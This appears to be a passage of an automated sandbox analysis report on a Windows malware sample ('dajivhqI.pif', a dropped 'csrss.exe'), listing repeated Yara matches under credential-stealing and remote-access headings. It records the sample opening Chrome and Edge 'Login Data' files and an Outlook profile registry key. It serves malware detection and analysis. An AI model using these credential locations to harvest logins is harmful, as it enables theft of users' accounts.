                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E98B38 GetLocalTime,11_2_02E98B38
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA9F00 GetUserNameA,11_2_02EA9F00
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9B038 GetVersionExA,11_2_02E9B038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dajivhqI.pif PID: 7196, type: MEMORYSTR
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2495714250.0000000028AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dajivhqI.pif PID: 7196, type: MEMORYSTR
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2495714250.0000000028AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dajivhqI.pif PID: 7196, type: MEMORYSTR
                  Source: C:\Users\user\Links\dajivhqI.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2495714250.0000000028AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dajivhqI.pif PID: 7196, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dajivhqI.pif PID: 7196, type: MEMORYSTR
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2495714250.0000000028AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dajivhqI.pif PID: 7196, type: MEMORYSTR
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2b4e0000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.unpack, type: UNPACKEDPE
